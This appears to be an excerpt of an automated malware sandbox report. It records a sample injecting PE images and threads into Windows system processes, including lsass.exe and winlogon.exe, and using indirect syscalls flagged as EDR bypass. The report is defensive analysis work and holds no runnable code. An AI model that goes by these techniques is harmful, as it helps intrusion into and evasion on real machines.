Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,16_2_00000173D019FE30
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A96814A0 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,9_2_000001F5A96814A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A9688280 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F5A9688280
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968CE44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F5A968CE44
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A96885E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000001F5A96885E4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDD88 SetUnhandledExceptionFilter,14_2_00007FF6A54DDD88
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDE08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF6A54DDE08
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E2DC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF6A54E2DC8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDBA8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF6A54DDBA8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC522E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173CFC522E8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01BA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D01BA8B4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173D01B9E30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B85E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173D03B85E4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BCE44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D03BCE44
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B8280 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D03B8280
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DBA8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7D166DBA8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DD88 SetUnhandledExceptionFilter,17_2_00007FF7D166DD88
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DE08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF7D166DE08
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1672DC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7D1672DC8

HIPS / PFW / Operating System Protection Evasion

barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\gem2.exeMemory allocated: C:\Windows\System32\svchost.exe base: 173CD230000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 400000 protect: page execute and read and writeJump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A4590 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,14_2_00007FF6A54A4590
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1CA2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42AE2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56A2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A7D2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DA62C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2542C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBF92C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1602C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A172C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26992C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D5C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB962C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B2A2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84182C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D92C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC902C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E112C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CFCF2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D12C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D32C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1242C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82CD2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32292C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D6432C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF62C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BA23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BF23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12F23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 337D2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DE52C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9652C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A25C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D0382C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 164F2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D2E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 381E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38212C98
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeNtQueryInformationProcess: Indirect: 0x7FF7D1632286
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD230000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287A7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 2D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F132290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 35B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 252D6430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B60FF60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 3060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2BA0000 value starts with: 4D5A
